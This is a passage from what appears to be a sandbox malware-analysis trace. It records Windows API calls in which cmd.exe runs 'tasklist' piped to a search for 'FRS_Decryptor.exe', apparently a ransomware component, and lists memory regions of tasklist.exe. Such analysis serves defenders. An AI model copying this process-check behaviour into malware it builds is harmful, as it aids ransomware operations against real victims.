_MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0093.686] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0093.687] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0093.687] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0093.687] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0093.687] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0093.688] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xf0fa80*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf0facc | out: lpCommandLine="tasklist", lpProcessInformation=0xf0facc*(hProcess=0x64, hThread=0x60, dwProcessId=0x928, dwThreadId=0x93c)) returned 1 [0093.691] CloseHandle (hObject=0x60) returned 1 [0093.691] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0093.691] GetEnvironmentStringsW () returned 0x13e42d8* [0093.691] FreeEnvironmentStringsA (penv="=") returned 1 [0093.691] DeleteProcThreadAttributeList (in: lpAttributeList=0xf0faf8 | out: lpAttributeList=0xf0faf8) [0093.691] _get_osfhandle (_FileHandle=3) returned 0x54 [0093.691] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0093.691] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0093.691] _close (_FileHandle=5) returned 0 [0093.691] _dup (_FileHandle=0) returned 4 [0093.691] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0093.692] _close (_FileHandle=3) returned 0 [0093.692] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0093.692] SetErrorMode (uMode=0x0) returned 0x0 [0093.692] SetErrorMode (uMode=0x1) returned 0x0 [0093.692] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x13e42e0, lpFilePart=0xf0fb9c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0fb9c*="Desktop") returned 0x1c [0093.692] SetErrorMode (uMode=0x0) returned 0x1 [0093.692] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.692] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0093.692] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.692] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.692] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf0f928, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f928) returned 0xffffffff [0093.692] GetLastError () returned 0x2 [0093.692] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.692] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf0f928, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f928) returned 0x13e5628 [0093.692] FindClose (in: hFindFile=0x13e5628 | out: hFindFile=0x13e5628) returned 1 [0093.693] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xf0f928, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f928) returned 0xffffffff [0093.693] GetLastError () returned 0x2 [0093.693] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xf0f928, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f928) returned 0x13e5628 [0093.693] FindClose (in: hFindFile=0x13e5628 | out: hFindFile=0x13e5628) returned 1 [0093.693] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0093.693] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0093.693] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0093.693] SetErrorMode (uMode=0x0) returned 0x0 [0093.693] SetErrorMode (uMode=0x1) returned 0x0 [0093.693] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x13e4668, lpFilePart=0xf0f944 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf0f944*="Desktop") returned 0x1c [0093.693] SetErrorMode (uMode=0x0) returned 0x1 [0093.693] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.693] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0093.693] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.693] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.693] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf0f6d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f6d0) returned 0xffffffff [0093.693] GetLastError () returned 0x2 [0093.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xf0f6d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f6d0) returned 0x13e04a0 [0093.694] FindClose (in: hFindFile=0x13e04a0 | out: hFindFile=0x13e04a0) returned 1 [0093.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xf0f6d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f6d0) returned 0xffffffff [0093.694] GetLastError () returned 0x2 [0093.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xf0f6d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf0f6d0) returned 0x13e04a0 [0093.694] FindClose (in: hFindFile=0x13e04a0 | out: hFindFile=0x13e04a0) returned 1 [0093.694] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0093.694] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0093.694] GetConsoleTitleW (in: lpConsoleTitle=0xf0fbcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0093.694] InitializeProcThreadAttributeList (in: lpAttributeList=0xf0faf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf0fadc | out: lpAttributeList=0xf0faf8, lpSize=0xf0fadc) returned 1 [0093.694] UpdateProcThreadAttribute (in: lpAttributeList=0xf0faf8, dwFlags=0x0, Attribute=0x60001, lpValue=0xf0fae4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf0faf8, lpPreviousValue=0x0) returned 1 [0093.694] GetStartupInfoW (in: lpStartupInfo=0xf0fb30 | out: lpStartupInfo=0xf0fb30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x34c, hStdError=0x2c)) [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0093.695] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0093.695] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0093.695] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xf0fa80*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf0facc | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xf0facc*(hProcess=0x60, hThread=0x54, dwProcessId=0x4f0, dwThreadId=0x9e4)) returned 1 [0093.698] CloseHandle (hObject=0x54) returned 1 [0093.698] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0093.698] GetEnvironmentStringsW () returned 0x13ead78* [0093.698] FreeEnvironmentStringsA (penv="=") returned 1 [0093.698] DeleteProcThreadAttributeList (in: lpAttributeList=0xf0faf8 | out: lpAttributeList=0xf0faf8) [0093.698] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0093.698] _close (_FileHandle=4) returned 0 [0093.698] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0094.149] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xf0fe40 | out: lpExitCode=0xf0fe40*=0x0) returned 1 [0094.150] CloseHandle (hObject=0x64) returned 1 [0094.150] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0094.151] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xf0fe40 | out: lpExitCode=0xf0fe40*=0x0) returned 1 [0094.151] CloseHandle (hObject=0x60) returned 1 [0094.151] _get_osfhandle (_FileHandle=1) returned 0x34c [0094.151] SetConsoleMode (hConsoleHandle=0x34c, dwMode=0x0) returned 0 [0094.151] _get_osfhandle (_FileHandle=1) returned 0x34c [0094.151] GetConsoleMode (in: hConsoleHandle=0x34c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0094.151] _get_osfhandle (_FileHandle=0) returned 0x24 [0094.152] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0094.152] SetConsoleInputExeNameW () returned 0x1 [0094.152] GetConsoleOutputCP () returned 0x1b5 [0094.152] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0094.152] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.152] exit (_Code=0) Process: id = "83" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x6cbdd000" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0x934" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4363 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 4364 start_va = 0xad0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 4365 start_va = 0xaf0000 end_va = 0xaf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 4366 start_va = 0xb00000 end_va = 0xb0efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 4367 start_va = 0xb10000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 4368 start_va = 0xb50000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 4369 start_va = 0xb90000 end_va = 0xb93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 4370 start_va = 0xba0000 end_va = 0xba0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 4371 start_va = 0xbb0000 end_va = 0xbb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 4372 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4373 start_va = 0x7f180000 end_va = 0x7f1a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f180000" filename = "" Region: id = 4374 start_va = 0x7f1a4000 end_va = 0x7f1a4fff entry_point = 0x0 region_type = private name = "private_0x000000007f1a4000" filename = "" Region: id = 4375 start_va = 0x7f1a5000 end_va = 0x7f1a5fff entry_point = 0x0 region_type = private name = "private_0x000000007f1a5000" filename = "" Region: id = 4376 start_va = 0x7f1ad000 end_va = 0x7f1affff entry_point = 0x0 region_type = private name = "private_0x000000007f1ad000" filename = "" Region: id = 4377 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4378 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4379 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4380 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4400 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 4401 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4402 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4403 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4408 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 4409 start_va = 0xae0000 end_va = 0xae3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 4410 start_va = 0xaf0000 end_va = 0xaf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 4411 start_va = 0xbc0000 end_va = 0xc3dfff entry_point = 0xbc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4412 start_va = 0xc40000 end_va = 0xc40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 4413 start_va = 0xc50000 end_va = 0xc50fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 4414 start_va = 0xc60000 end_va = 0xc60fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 4415 start_va = 0xc70000 end_va = 0xc73fff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 4416 start_va = 0xc80000 end_va = 0xc80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 4417 start_va = 0xc90000 end_va = 0xc90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 4418 start_va = 0xd00000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 4419 start_va = 0xdc0000 end_va = 0xf01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 4420 start_va = 0xf20000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 4421 start_va = 0x1020000 end_va = 0x11a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 4422 start_va = 0x11b0000 end_va = 0x1330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 4423 start_va = 0x1340000 end_va = 0x273ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001340000" filename = "" Region: id = 4424 start_va = 0x2740000 end_va = 0x2a14fff entry_point = 0x2740000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4425 start_va = 0x2a20000 end_va = 0x2e1bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a20000" filename = "" Region: id = 4426 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4427 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4428 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 4429 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4430 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4431 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4432 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 4433 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4434 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4435 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4436 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4437 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4438 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4439 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4440 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4441 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4442 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4443 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4444 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4445 start_va = 0x74ee0000 end_va = 0x74f2cfff 